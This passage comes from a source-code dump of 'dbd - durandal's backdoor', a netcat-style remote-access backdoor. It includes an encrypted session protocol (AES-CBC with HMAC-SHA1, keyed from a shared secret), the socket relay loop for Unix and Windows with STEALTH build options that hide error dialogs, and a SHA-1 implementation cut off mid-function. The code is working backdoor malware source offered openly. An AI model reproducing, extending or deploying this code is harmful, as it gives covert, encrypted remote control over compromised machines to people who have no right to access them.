); 75 | int pel_recv_all( SOCKET s, void *buf, size_t len, int flags ); 76 | #else 77 | int pel_send_all( int s, void *buf, size_t len, int flags ); 78 | int pel_recv_all( int s, void *buf, size_t len, int flags ); 79 | #endif 80 | 81 | 82 | /* session setup - client side */ 83 | 84 | #ifdef WIN32 85 | int pel_client_init( SOCKET server, char *key ) 86 | #else 87 | int pel_client_init( int server, char *key ) 88 | #endif 89 | { 90 | int ret, len, pid; 91 | 92 | #ifdef WIN32 93 | SYSTEMTIME lpstm; 94 | #else 95 | struct timeval tv; 96 | #endif 97 | 98 | struct sha1_context sha1_ctx; 99 | unsigned char IV1[20], IV2[20]; 100 | 101 | /* generate both initialization vectors */ 102 | 103 | pid = getpid(); 104 | 105 | #ifdef WIN32 106 | GetSystemTime(&lpstm); 107 | #else 108 | if( gettimeofday( &tv, NULL ) < 0 ) { 109 | pel_errno = PEL_SYSTEM_ERROR; 110 | return( PEL_FAILURE ); 111 | } 112 | #endif 113 | 114 | sha1_starts( &sha1_ctx ); 115 | #ifdef WIN32 116 | sha1_update( &sha1_ctx, (uint8 *) &lpstm, sizeof( lpstm ) ); 117 | #else 118 | sha1_update( &sha1_ctx, (uint8 *) &tv, sizeof( tv ) ); 119 | #endif 120 | sha1_update( &sha1_ctx, (uint8 *) &pid, sizeof( pid ) ); 121 | sha1_finish( &sha1_ctx, &buffer[ 0] ); 122 | 123 | memcpy( IV1, &buffer[ 0], 20 ); 124 | 125 | pid++; 126 | 127 | #ifdef WIN32 128 | /* Win32 has only millisec resolution, but we call it again anyway */ 129 | GetSystemTime(&lpstm); 130 | #else 131 | if( gettimeofday( &tv, NULL ) < 0 ) 132 | { 133 | pel_errno = PEL_SYSTEM_ERROR; 134 | 135 | return( PEL_FAILURE ); 136 | } 137 | #endif 138 | 139 | sha1_starts( &sha1_ctx ); 140 | #ifdef WIN32 141 | sha1_update( &sha1_ctx, (uint8 *) &lpstm, sizeof( lpstm ) ); 142 | #else 143 | sha1_update( &sha1_ctx, (uint8 *) &tv, sizeof( tv ) ); 144 | #endif 145 | sha1_update( &sha1_ctx, (uint8 *) &pid, sizeof( pid ) ); 146 | sha1_finish( &sha1_ctx, &buffer[20] ); 147 | 148 | memcpy( IV2, &buffer[20], 20 ); 149 | 150 | /* and pass them to the server */ 151 | 152 | ret = pel_send_all( server, buffer, 40, 0 ); 153 | 154 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 155 | 156 | /* setup the session keys */ 157 | 158 | pel_setup_context( &send_ctx, key, IV1 ); 159 | pel_setup_context( &recv_ctx, key, IV2 ); 160 | 161 | /* handshake - encrypt and send the client's challenge */ 162 | 163 | ret = pel_send_msg( server, challenge, 16 ); 164 | 165 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 166 | 167 | /* handshake - decrypt and verify the server's challenge */ 168 | 169 | len = sizeof(buffer); 170 | ret = pel_recv_msg( server, buffer, &len ); 171 | 172 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 173 | 174 | if( len != 16 || memcmp( buffer, challenge, 16 ) != 0 ) 175 | { 176 | pel_errno = PEL_WRONG_CHALLENGE; 177 | 178 | return( PEL_FAILURE ); 179 | } 180 | 181 | pel_errno = PEL_UNDEFINED_ERROR; 182 | 183 | return( PEL_SUCCESS ); 184 | } 185 | 186 | /* session setup - server side */ 187 | 188 | #ifdef WIN32 189 | int pel_server_init( SOCKET client, char *key ) 190 | #else 191 | int pel_server_init( int client, char *key ) 192 | #endif 193 | { 194 | int ret, len; 195 | unsigned char IV1[20], IV2[20]; 196 | 197 | /* get the IVs from the client */ 198 | 199 | ret = pel_recv_all( client, buffer, 40, 0 ); 200 | 201 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 202 | 203 | memcpy( IV2, &buffer[ 0], 20 ); 204 | memcpy( IV1, &buffer[20], 20 ); 205 | 206 | /* setup the session keys */ 207 | 208 | pel_setup_context( &send_ctx, key, IV1 ); 209 | pel_setup_context( &recv_ctx, key, IV2 ); 210 | 211 | /* handshake - decrypt and verify the client's challenge */ 212 | 213 | len = sizeof(buffer); 214 | ret = pel_recv_msg( client, buffer, &len ); 215 | 216 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 217 | 218 | if( len != 16 || memcmp( buffer, challenge, 16 ) != 0 ) 219 | { 220 | pel_errno = PEL_WRONG_CHALLENGE; 221 | 222 | return( PEL_FAILURE ); 223 | } 224 | 225 | /* handshake - encrypt and send the server's challenge */ 226 | 227 | ret = pel_send_msg( client, challenge, 16 ); 228 | 229 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 230 | 231 | pel_errno = PEL_UNDEFINED_ERROR; 232 | 233 | return( PEL_SUCCESS ); 234 | } 235 | 236 | /* this routine computes the AES & HMAC session keys */ 237 | 238 | void pel_setup_context( struct pel_context *pel_ctx, 239 | char *key, unsigned char IV[20] ) 240 | { 241 | int i; 242 | struct sha1_context sha1_ctx; 243 | 244 | sha1_starts( &sha1_ctx ); 245 | sha1_update( &sha1_ctx, (uint8 *) key, strlen( key ) ); 246 | sha1_update( &sha1_ctx, IV, 20 ); 247 | sha1_finish( &sha1_ctx, buffer ); 248 | 249 | aes_set_key( &pel_ctx->SK, buffer, 128 ); 250 | 251 | memcpy( pel_ctx->LCT, IV, 16 ); 252 | 253 | memset( pel_ctx->k_ipad, 0x36, 64 ); 254 | memset( pel_ctx->k_opad, 0x5C, 64 ); 255 | 256 | for( i = 0; i < 20; i++ ) 257 | { 258 | pel_ctx->k_ipad[i] ^= buffer[i]; 259 | pel_ctx->k_opad[i] ^= buffer[i]; 260 | } 261 | 262 | pel_ctx->p_cntr = 0; 263 | } 264 | 265 | /* encrypt and transmit a message */ 266 | 267 | #ifdef WIN32 268 | int pel_send_msg( SOCKET sockfd, unsigned char *msg, int length ) 269 | #else 270 | int pel_send_msg( int sockfd, unsigned char *msg, int length ) 271 | #endif 272 | { 273 | unsigned char digest[20]; 274 | struct sha1_context sha1_ctx; 275 | int i, j, ret, blk_len; 276 | 277 | /* verify the message length */ 278 | 279 | if( length <= 0 || length > BUFSIZE ) 280 | { 281 | pel_errno = PEL_BAD_MSG_LENGTH; 282 | 283 | return( PEL_FAILURE ); 284 | } 285 | 286 | /* write the message length at start of buffer */ 287 | 288 | buffer[0] = ( length >> 8 ) & 0xFF; 289 | buffer[1] = ( length ) & 0xFF; 290 | 291 | /* append the message content */ 292 | 293 | memcpy( buffer + 2, msg, length ); 294 | 295 | /* round up to AES block length (16 bytes) */ 296 | 297 | blk_len = 2 + length; 298 | 299 | if( ( blk_len & 0x0F ) != 0 ) 300 | { 301 | blk_len += 16 - ( blk_len & 0x0F ); 302 | } 303 | 304 | /* encrypt the buffer with AES-CBC-128 */ 305 | 306 | for( i = 0; i < blk_len; i += 16 ) 307 | { 308 | for( j = 0; j < 16; j++ ) 309 | { 310 | buffer[i + j] ^= send_ctx.LCT[j]; 311 | } 312 | 313 | aes_encrypt( &send_ctx.SK, &buffer[i], &buffer[i] ); 314 | memcpy( send_ctx.LCT, &buffer[i], 16 ); 315 | } 316 | 317 | /* compute the HMAC-SHA1 of the ciphertext */ 318 | 319 | buffer[blk_len ] = ( send_ctx.p_cntr << 24 ) & 0xFF; 320 | buffer[blk_len + 1] = ( send_ctx.p_cntr << 16 ) & 0xFF; 321 | buffer[blk_len + 2] = ( send_ctx.p_cntr << 8 ) & 0xFF; 322 | buffer[blk_len + 3] = ( send_ctx.p_cntr ) & 0xFF; 323 | 324 | sha1_starts( &sha1_ctx ); 325 | sha1_update( &sha1_ctx, send_ctx.k_ipad, 64 ); 326 | sha1_update( &sha1_ctx, buffer, blk_len + 4 ); 327 | sha1_finish( &sha1_ctx, digest ); 328 | 329 | sha1_starts( &sha1_ctx ); 330 | sha1_update( &sha1_ctx, send_ctx.k_opad, 64 ); 331 | sha1_update( &sha1_ctx, digest, 20 ); 332 | sha1_finish( &sha1_ctx, &buffer[blk_len] ); 333 | 334 | /* increment the packet counter */ 335 | 336 | send_ctx.p_cntr++; 337 | 338 | /* transmit ciphertext and message authentication code */ 339 | 340 | ret = pel_send_all( sockfd, buffer, blk_len + 20, 0 ); 341 | 342 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 343 | 344 | pel_errno = PEL_UNDEFINED_ERROR; 345 | 346 | return( PEL_SUCCESS ); 347 | } 348 | 349 | /* receive and decrypt a message */ 350 | 351 | #ifdef WIN32 352 | int pel_recv_msg( SOCKET sockfd, unsigned char *msg, int *length ) 353 | #else 354 | int pel_recv_msg( int sockfd, unsigned char *msg, int *length ) 355 | #endif 356 | { 357 | unsigned char temp[16]; 358 | unsigned char hmac[20]; 359 | unsigned char digest[20]; 360 | struct sha1_context sha1_ctx; 361 | int i, j, ret, blk_len; 362 | 363 | /* 364 | first, check that length isn't below BUFSIZE, otherwise we're in 365 | trouble! this prevents a shameful possible buffer overflow! 366 | 367 | WARNING!! you *have to* initialize "length" before passing it to this 368 | function! e.g.: 369 | int len = sizeof(mybuf); 370 | pel_recv_msg(socket, mybuf, &len); 371 | 372 | (modification by Michel Blomgren ) 373 | */ 374 | if (*length < BUFSIZE) { 375 | pel_errno = PEL_BAD_MSG_LENGTH; 376 | return (PEL_FAILURE); 377 | } 378 | 379 | 380 | 381 | /* receive the first encrypted block */ 382 | 383 | ret = pel_recv_all( sockfd, buffer, 16, 0 ); 384 | 385 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 386 | 387 | /* decrypt this block and extract the message length */ 388 | 389 | memcpy( temp, buffer, 16 ); 390 | aes_decrypt( &recv_ctx.SK, buffer, buffer); 391 | 392 | for( j = 0; j < 16; j++ ) 393 | { 394 | buffer[j] ^= recv_ctx.LCT[j]; 395 | } 396 | 397 | *length = ( ((int) buffer[0]) << 8 ) + (int) buffer[1]; 398 | 399 | /* restore the ciphertext */ 400 | 401 | memcpy( buffer, temp, 16 ); 402 | 403 | /* verify the message length */ 404 | 405 | if( *length <= 0 || *length > BUFSIZE ) 406 | { 407 | pel_errno = PEL_BAD_MSG_LENGTH; 408 | 409 | return( PEL_FAILURE ); 410 | } 411 | 412 | /* round up to AES block length (16 bytes) */ 413 | 414 | blk_len = 2 + *length; 415 | 416 | if( ( blk_len & 0x0F ) != 0 ) 417 | { 418 | blk_len += 16 - ( blk_len & 0x0F ); 419 | } 420 | 421 | /* receive the remaining ciphertext and the mac */ 422 | 423 | ret = pel_recv_all( sockfd, &buffer[16], blk_len - 16 + 20, 0 ); 424 | 425 | if( ret != PEL_SUCCESS ) return( PEL_FAILURE ); 426 | 427 | memcpy( hmac, &buffer[blk_len], 20 ); 428 | 429 | /* verify the ciphertext integrity */ 430 | 431 | buffer[blk_len ] = ( recv_ctx.p_cntr << 24 ) & 0xFF; 432 | buffer[blk_len + 1] = ( recv_ctx.p_cntr << 16 ) & 0xFF; 433 | buffer[blk_len + 2] = ( recv_ctx.p_cntr << 8 ) & 0xFF; 434 | buffer[blk_len + 3] = ( recv_ctx.p_cntr ) & 0xFF; 435 | 436 | sha1_starts( &sha1_ctx ); 437 | sha1_update( &sha1_ctx, recv_ctx.k_ipad, 64 ); 438 | sha1_update( &sha1_ctx, buffer, blk_len + 4 ); 439 | sha1_finish( &sha1_ctx, digest ); 440 | 441 | sha1_starts( &sha1_ctx ); 442 | sha1_update( &sha1_ctx, recv_ctx.k_opad, 64 ); 443 | sha1_update( &sha1_ctx, digest, 20 ); 444 | sha1_finish( &sha1_ctx, digest ); 445 | 446 | if( memcmp( hmac, digest, 20 ) != 0 ) 447 | { 448 | pel_errno = PEL_CORRUPTED_DATA; 449 | 450 | return( PEL_FAILURE ); 451 | } 452 | 453 | /* increment the packet counter */ 454 | 455 | recv_ctx.p_cntr++; 456 | 457 | /* finally, decrypt and copy the message */ 458 | 459 | for( i = 0; i < blk_len; i += 16 ) 460 | { 461 | memcpy( temp, &buffer[i], 16 ); 462 | aes_decrypt( &recv_ctx.SK, &buffer[i], &buffer[i] ); 463 | 464 | for( j = 0; j < 16; j++ ) 465 | { 466 | buffer[i + j] ^= recv_ctx.LCT[j]; 467 | } 468 | 469 | memcpy( recv_ctx.LCT, temp, 16 ); 470 | } 471 | 472 | memcpy( msg, &buffer[2], *length ); 473 | 474 | pel_errno = PEL_UNDEFINED_ERROR; 475 | 476 | return( PEL_SUCCESS ); 477 | } 478 | 479 | /* send/recv wrappers to handle fragmented TCP packets */ 480 | 481 | #ifdef WIN32 482 | int pel_send_all( SOCKET s, void *buf, size_t len, int flags ) 483 | #else 484 | int pel_send_all( int s, void *buf, size_t len, int flags ) 485 | #endif 486 | { 487 | int n; 488 | size_t sum = 0; 489 | char *offset = buf; 490 | 491 | while( sum < len ) 492 | { 493 | n = send( s, (void *) offset, len - sum, flags ); 494 | 495 | #ifdef WIN32 496 | if (n == SOCKET_ERROR) { 497 | pel_errno = PEL_SYSTEM_ERROR; 498 | return(PEL_FAILURE); 499 | } 500 | #else 501 | if( n < 0 ) 502 | { 503 | pel_errno = PEL_SYSTEM_ERROR; 504 | 505 | return( PEL_FAILURE ); 506 | } 507 | #endif 508 | 509 | sum += n; 510 | 511 | offset += n; 512 | } 513 | 514 | pel_errno = PEL_UNDEFINED_ERROR; 515 | 516 | return( PEL_SUCCESS ); 517 | } 518 | 519 | #ifdef WIN32 520 | int pel_recv_all( SOCKET s, void *buf, size_t len, int flags ) 521 | #else 522 | int pel_recv_all( int s, void *buf, size_t len, int flags ) 523 | #endif 524 | { 525 | int n; 526 | size_t sum = 0; 527 | char *offset = buf; 528 | 529 | while( sum < len ) 530 | { 531 | n = recv( s, (void *) offset, len - sum, flags ); 532 | 533 | if( n == 0 ) 534 | { 535 | pel_errno = PEL_CONN_CLOSED; 536 | return( PEL_FAILURE ); 537 | } 538 | 539 | #ifdef WIN32 540 | if (n == SOCKET_ERROR) { 541 | pel_errno = PEL_SYSTEM_ERROR; 542 | return(PEL_FAILURE); 543 | } 544 | #else 545 | if( n < 0 ) 546 | { 547 | pel_errno = PEL_SYSTEM_ERROR; 548 | 549 | return( PEL_FAILURE ); 550 | } 551 | #endif 552 | 553 | sum += n; 554 | 555 | offset += n; 556 | } 557 | 558 | pel_errno = PEL_UNDEFINED_ERROR; 559 | 560 | return( PEL_SUCCESS ); 561 | } 562 | -------------------------------------------------------------------------------- /pel.h: -------------------------------------------------------------------------------- 1 | #ifndef _PEL_H 2 | #define _PEL_H 3 | 4 | #define BUFSIZE 128 /* maximum message length */ 5 | 6 | #define PEL_SUCCESS 1 7 | #define PEL_FAILURE 0 8 | 9 | #define PEL_SYSTEM_ERROR -1 10 | #define PEL_CONN_CLOSED -2 11 | #define PEL_WRONG_CHALLENGE -3 12 | #define PEL_BAD_MSG_LENGTH -4 13 | #define PEL_CORRUPTED_DATA -5 14 | #define PEL_UNDEFINED_ERROR -6 15 | 16 | extern int pel_errno; 17 | 18 | #ifdef WIN32 19 | int pel_client_init( SOCKET server, char *key ); 20 | int pel_server_init( SOCKET client, char *key ); 21 | int pel_send_msg( SOCKET sockfd, unsigned char *msg, int length ); 22 | int pel_recv_msg( SOCKET sockfd, unsigned char *msg, int *length ); 23 | #else 24 | int pel_client_init( int server, char *key ); 25 | int pel_server_init( int client, char *key ); 26 | int pel_send_msg( int sockfd, unsigned char *msg, int length ); 27 | int pel_recv_msg( int sockfd, unsigned char *msg, int *length ); 28 | #endif 29 | 30 | 31 | #endif /* pel.h */ 32 | -------------------------------------------------------------------------------- /readwrite.h: -------------------------------------------------------------------------------- 1 | /* 2 | * dbd - durandal's backdoor 3 | * Copyright (C) 2013 Kyle Barnthouse 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms of the GNU General Public License as published by the Free 7 | * Software Foundation; either version 2 of the License, or (at your option) 8 | * any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, but WITHOUT 11 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 12 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 13 | * more details. 14 | * 15 | * You should have received a copy of the GNU General Public License along 16 | * with this program; if not, write to the Free Software Foundation, Inc., 59 17 | * Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | * 19 | * See the COPYING file for more information. 20 | */ 21 | 22 | #ifdef WIN32 23 | 24 | /* for Windows... */ 25 | int readwrite(SOCKET peersd) { 26 | char buf[BUFSIZE]; 27 | 28 | #ifndef WINMAIN 29 | int stdin_is_tty; 30 | #endif 31 | 32 | 33 | #ifndef WINMAIN 34 | if (!_isatty(STDOUT_FILENO)) { 35 | _setmode(STDOUT_FILENO, _O_BINARY); 36 | } 37 | 38 | if ((stdin_is_tty = _isatty(STDIN_FILENO)) == FALSE) { 39 | _setmode(STDIN_FILENO, _O_BINARY); 40 | } 41 | #endif 42 | 43 | 44 | while(1) { 45 | fd_set fds; 46 | struct timeval tv; 47 | 48 | FD_ZERO(&fds); 49 | FD_SET(peersd, &fds); 50 | 51 | tv.tv_sec = 0; 52 | tv.tv_usec = 1000; 53 | 54 | if (select(FD_SETSIZE, &fds, NULL, NULL, &tv) != SOCKET_ERROR) { 55 | int cnt; 56 | if (FD_ISSET(peersd, &fds)) { 57 | if (use_encryption) { 58 | /* note: pel_recv_msg() modifies cnt */ 59 | cnt = sizeof(buf); 60 | if (pel_recv_msg(peersd, buf, &cnt) != PEL_SUCCESS) { 61 | #ifdef DEBUG 62 | #ifndef WINMAIN 63 | fprintf(stderr, "pel_recv_msg failed\n"); 64 | #else 65 | errbox("pel_recv_msg failed!"); 66 | #endif 67 | #endif 68 | break; 69 | } 70 | if (cnt == 0) { 71 | break; 72 | } 73 | } else { 74 | if ((cnt = recv(peersd, buf, sizeof(buf), 0)) == SOCKET_ERROR) { 75 | int wsaerr = WSAGetLastError(); 76 | if (wsaerr == WSAEWOULDBLOCK) { /* don't think this is used */ 77 | continue; 78 | } else { 79 | break; 80 | } 81 | } else if (cnt == 0) { 82 | break; 83 | } 84 | } 85 | 86 | #ifndef WINMAIN 87 | if (highlight_incoming) { 88 | write(STDOUT_FILENO, highlight_prefix, sizeof(highlight_prefix)-1); 89 | write(STDOUT_FILENO, buf, cnt); 90 | write(STDOUT_FILENO, highlight_suffix, sizeof(highlight_suffix)-1); 91 | } else { 92 | write(STDOUT_FILENO, buf, cnt); 93 | } 94 | #else 95 | #ifndef STEALTH 96 | forkmsgbox(buf, cnt); 97 | #endif 98 | #endif 99 | 100 | } 101 | } else { 102 | #ifndef WINMAIN 103 | if (!quiet) 104 | fprintf(stderr, "select(): %s\n", WSAstrerror(WSAGetLastError())); 105 | #else 106 | #ifndef STEALTH 107 | if (!quiet) 108 | wsaerrbox("select()", WSAGetLastError()); 109 | #endif 110 | #endif 111 | break; 112 | } 113 | 114 | #ifndef WINMAIN 115 | if (stdin_is_tty) { 116 | if (kbhit()) { 117 | /* once a key is hit, read() will block until CR has been 118 | * received :\ */ 119 | int cnt = read(STDIN_FILENO, buf, sizeof(buf)); 120 | if (cnt <= 0) { 121 | break; 122 | } 123 | 124 | if (use_encryption) { 125 | if (prefix_outgoing_with) { 126 | char stackbuf[128]; 127 | snprintf(stackbuf, sizeof(stackbuf), "%s%s", prefix_outgoing_with, separator_between_prefix_and_data); 128 | if (pel_send_msg(peersd, stackbuf, strlen(stackbuf)) != PEL_SUCCESS) { 129 | #ifdef DEBUG 130 | fprintf(stderr, "pel_send_msg failed\n"); 131 | #endif 132 | break; 133 | } 134 | } 135 | if (pel_send_msg(peersd, buf, cnt) != PEL_SUCCESS) { 136 | #ifdef DEBUG 137 | fprintf(stderr, "pel_send_msg failed\n"); 138 | #endif 139 | break; 140 | } 141 | } else { 142 | if (prefix_outgoing_with) { 143 | char stackbuf[128]; 144 | snprintf(stackbuf, sizeof(stackbuf), "%s%s", prefix_outgoing_with, separator_between_prefix_and_data); 145 | send(peersd, stackbuf, strlen(stackbuf), 0); 146 | } 147 | send(peersd, buf, cnt, 0); 148 | } 149 | } 150 | } else { 151 | /* for every line read from the socket, this will block until a CR 152 | has been received :( 153 | */ 154 | int cnt = read(STDIN_FILENO, buf, sizeof(buf)); 155 | if (cnt <= 0) { 156 | break; 157 | } else { 158 | if (use_encryption) { 159 | if (pel_send_msg(peersd, buf, cnt) != PEL_SUCCESS) { 160 | #ifdef DEBUG 161 | #ifndef WINMAIN 162 | fprintf(stderr, "pel_send_msg failed\n"); 163 | #else 164 | #ifndef STEALTH 165 | errbox("pel_send_msg failed!"); 166 | #endif 167 | #endif 168 | #endif 169 | break; 170 | } 171 | } else { 172 | send(peersd, buf, cnt, 0); 173 | } 174 | } 175 | } 176 | #endif 177 | 178 | } 179 | return 0; 180 | } 181 | 182 | #else 183 | 184 | /* for Unix-like operating systems... */ 185 | int readwrite(int peersd) { 186 | char buf[BUFSIZE]; 187 | int skipstdin = 0; 188 | 189 | while(1) { 190 | fd_set fds; 191 | struct timeval to1; 192 | int sel; 193 | 194 | FD_ZERO(&fds); 195 | if (!skipstdin) { 196 | FD_SET(STDIN_FILENO, &fds); 197 | } 198 | FD_SET(peersd, &fds); 199 | 200 | if (immobility_timeout > 0) { 201 | to1.tv_sec = immobility_timeout; 202 | to1.tv_usec = 0; 203 | sel = select(FD_SETSIZE, &fds, NULL, NULL, &to1); 204 | } else { 205 | sel = select(FD_SETSIZE, &fds, NULL, NULL, NULL); 206 | } 207 | if (sel > 0) { 208 | int cnt; 209 | if (FD_ISSET(STDIN_FILENO, &fds)) { 210 | if ((cnt = read(STDIN_FILENO, buf, sizeof(buf))) < 1) { 211 | if ((cnt < 0) && (errno == EWOULDBLOCK || errno == EAGAIN)) { 212 | continue; 213 | } else { 214 | skipstdin = 1; 215 | continue; 216 | } 217 | } 218 | 219 | if (use_encryption) { 220 | if (prefix_outgoing_with) { 221 | char stackbuf[128]; 222 | snprintf(stackbuf, sizeof(stackbuf), "%s%s", prefix_outgoing_with, separator_between_prefix_and_data); 223 | if (pel_send_msg(peersd, stackbuf, strlen(stackbuf)) != PEL_SUCCESS) { 224 | #ifdef DEBUG 225 | fprintf(stderr, "pel_send_msg failed\n"); 226 | #endif 227 | break; 228 | } 229 | } 230 | if (pel_send_msg(peersd, buf, cnt) != PEL_SUCCESS) { 231 | #ifdef DEBUG 232 | fprintf(stderr, "pel_send_msg failed\n"); 233 | #endif 234 | break; 235 | } 236 | } else { 237 | if (prefix_outgoing_with) { 238 | char stackbuf[128]; 239 | snprintf(stackbuf, sizeof(stackbuf), "%s%s", prefix_outgoing_with, separator_between_prefix_and_data); 240 | send(peersd, stackbuf, strlen(stackbuf), 0); 241 | } 242 | send(peersd, buf, cnt, 0); 243 | } 244 | } 245 | 246 | if (FD_ISSET(peersd, &fds)) { 247 | if (use_encryption) { 248 | /* note: pel_recv_msg() modifies cnt */ 249 | cnt = sizeof(buf); 250 | if (pel_recv_msg(peersd, buf, &cnt) != PEL_SUCCESS) { 251 | #ifdef DEBUG 252 | fprintf(stderr, "pel_recv_msg failed\n"); 253 | #endif 254 | break; 255 | } 256 | } else { 257 | if ((cnt = recv(peersd, buf, sizeof(buf), 0)) < 1) { 258 | if ((cnt < 0) && (errno == EWOULDBLOCK || errno == EAGAIN)) { 259 | continue; 260 | } else { 261 | break; 262 | } 263 | } 264 | } 265 | if (highlight_incoming) { 266 | write(STDOUT_FILENO, highlight_prefix, sizeof(highlight_prefix)-1); 267 | write(STDOUT_FILENO, buf, cnt); 268 | write(STDOUT_FILENO, highlight_suffix, sizeof(highlight_suffix)-1); 269 | } else { 270 | write(STDOUT_FILENO, buf, cnt); 271 | } 272 | } 273 | } else { 274 | /* break loop if select() returns 0 or < 0 */ 275 | break; 276 | } 277 | } 278 | return 0; 279 | } 280 | #endif 281 | -------------------------------------------------------------------------------- /sha1.c: -------------------------------------------------------------------------------- 1 | /* 2 | * FIPS 180-1 compliant SHA-1 implementation, 3 | * by Christophe Devine ; 4 | * this program is licensed under the GPL. 5 | */ 6 | 7 | #include 8 | #include "sha1.h" 9 | 10 | #define GET_UINT32(n,b,i) \ 11 | { \ 12 | (n) = ( (uint32) (b)[(i) ] << 24 ) \ 13 | | ( (uint32) (b)[(i) + 1] << 16 ) \ 14 | | ( (uint32) (b)[(i) + 2] << 8 ) \ 15 | | ( (uint32) (b)[(i) + 3] ); \ 16 | } 17 | 18 | #define PUT_UINT32(n,b,i) \ 19 | { \ 20 | (b)[(i) ] = (uint8) ( (n) >> 24 ); \ 21 | (b)[(i) + 1] = (uint8) ( (n) >> 16 ); \ 22 | (b)[(i) + 2] = (uint8) ( (n) >> 8 ); \ 23 | (b)[(i) + 3] = (uint8) ( (n) ); \ 24 | } 25 | 26 | void sha1_starts( struct sha1_context *ctx ) 27 | { 28 | ctx->total[0] = 0; 29 | ctx->total[1] = 0; 30 | ctx->state[0] = 0x67452301; 31 | ctx->state[1] = 0xEFCDAB89; 32 | ctx->state[2] = 0x98BADCFE; 33 | ctx->state[3] = 0x10325476; 34 | ctx->state[4] = 0xC3D2E1F0; 35 | } 36 | 37 | void sha1_process( struct sha1_context *ctx, uint8 data[64] ) 38 | { 39 | uint32 temp, A, B, C, D, E, W[16]; 40 | 41 | GET_UINT32( W[0], data, 0 ); 42 | GET_UINT32( W[1], data, 4 ); 43 | GET_UINT32( W[2], data, 8 ); 44 | GET_UINT32( W[3], data, 12 ); 45 | GET_UINT32( W[4], data, 16 ); 46 | GET_UINT32( W[5], data, 20 ); 47 | GET_UINT32( W[6], data, 24 ); 48 | GET_UINT32( W[7], data, 28 ); 49 | GET_UINT32( W[8], data, 32 ); 50 | GET_UINT32( W[9], data, 36 ); 51 | GET_UINT32( W[10], data, 40 ); 52 | GET_UINT32( W[11], data, 44 ); 53 | GET_UINT32( W[12], data, 48 ); 54 | GET_UINT32( W[13], data, 52 ); 55 | GET_UINT32( W[14], data, 56 ); 56 | GET_UINT32( W[15], data, 60 ); 57 | 58 | #define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n))) 59 | 60 | #define R(t) \ 61 | ( \ 62 | temp = W[(t - 3) & 0x0F] ^ W[(t - 8) & 0x0F] ^ \ 63 | W[(t - 14) & 0x0F] ^ W[ t & 0x0F], \ 64 | ( W[t & 0x0F] = S(temp,1) ) \ 65 | ) 66 | 67 | #define P(a,b,c,d,e,x) \ 68 | { \ 69 | e += S(a,5) + F(b,c,d) + K + x; b = S(b,30); \ 70 | } 71 | 72 | A = ctx->state[0]; 73 | B = ctx->state[1]; 74 | C = ctx->state[2]; 75 | D = ctx->state[3]; 76 | E = ctx->state[4]; 77 | 78 | #define F(x,y,z) (z ^ (x & (y ^ z))) 79 | #define K 0x5A827999 80 | 81 | P( A, B, C, D, E, W[0] ); 82 | P( E, A, B, C, D, W[1] ); 83 | P( D, E, A, B, C, W[2] ); 84 | P( C, D, E, A, B, W[3] ); 85 | P( B, C, D, E, A, W[4] ); 86 | P( A, B, C, D, E, W[5] ); 87 | P( E, A, B, C, D, W[6] ); 88 | P( D, E, A, B, C, W[7] ); 89 | P( C, D, E, A, B, W[8] ); 90 | P( B, C, D, E, A, W[9] ); 91 | P( A, B, C, D, E, W[10] ); 92 | P( E, A, B, C, D, W[11] ); 93 | P( D, E, A, B, C, W[12] ); 94 | P( C, D, E, A, B, W[13] ); 95 | P( B, C, D, E, A, W[14] ); 96 | P( A, B, C, D, E, W[15] ); 97 | P( E, A, B, C, D, R(16) ); 98 | P( D, E, A, B, C, R(17) ); 99 | P( C, D, E, A, B, R(18) ); 100 | P( B, C, D, E, A, R(19) ); 101 | 102 | #undef K 103 | #undef F 104 | 105 | #define F(x,y,z) (x ^ y ^ z) 106 | #define K 0x6ED9EBA1 107 | 108 | P( A, B, C, D, E, R(20) ); 109 | P( E, A, B, C, D, R(21) ); 110 | P( D, E, A, B, C, R(22) ); 111 | P( C, D, E, A, B, R(23) ); 112 | P( B, C, D, E, A, R(24) ); 113 | P( A, B, C, D, E, R(25) ); 114 | P( E, A, B, C, D, R(26) ); 115 | P( D, E, A, B, C, R(27) ); 116 | P( C, D, E, A, B, R(28) ); 117 | P( B, C, D, E, A, R(29) ); 118 | P( A, B, C, D, E, R(30) ); 119 | P( E, A, B, C, D, R(31) ); 120 | P( D, E, A, B, C, R(32) ); 121 | P( C, D, E, A, B, R(33) ); 122 | P( B, C, D, E, A, R(34) ); 123 | P( A, B, C, D, E, R(35) ); 124 | P( E, A, B, C, D, R(36) ); 125 | P( D, E, A, B, C, R(37) ); 126 | P( C, D, E, A, B, R(38) ); 127 | P( B, C, D, E, A, R(39) ); 128 | 129 | #undef K 130 | #undef F 131 | 132 | #define F(x,y,z) ((x & y) | (z & (x | y))) 133 | #define K 0x8F1BBCDC 134 | 135 | P( A, B, C, D, E, R(40) ); 136 | P( E, A, B, C, D, R(41) ); 137 | P( D, E, A, B, C, R(42) ); 138 | P( C, D, E, A, B, R(43) ); 139 | P( B, C, D, E, A, R(44) ); 140 | P( A, B, C, D, E, R(45) ); 141 | P( E, A, B, C, D, R(46) ); 142 | P( D, E, A, B, C, R(47) ); 143 | P( C, D, E, A, B, R(48) ); 144 | P( B, C, D, E, A, R(49) ); 145 | P( A, B, C, D, E, R(50) ); 146 | P( E, A, B, C, D, R(51) ); 147 | P( D, E, A, B, C, R(52) ); 148 | P( C, D, E, A, B, R(53) ); 149 | P( B, C, D, E, A, R(54) ); 150 | P( A, B, C, D, E, R(55) ); 151 | P( E, A, B, C, D, R(56) ); 152 | P( D, E, A, B, C, R(57) ); 153 | P( C, D, E, A, B, R(58) ); 154 | P( B, C, D, E, A, R(59) ); 155 | 156 | #undef K 157 | #undef F 158 | 159 | #define F(x,y,z) (x ^ y ^ z) 160 | #define K 0xCA62C1D6 161 | 162 | P( A, B, C, D, E, R(60) ); 163 | P( E, A, B, 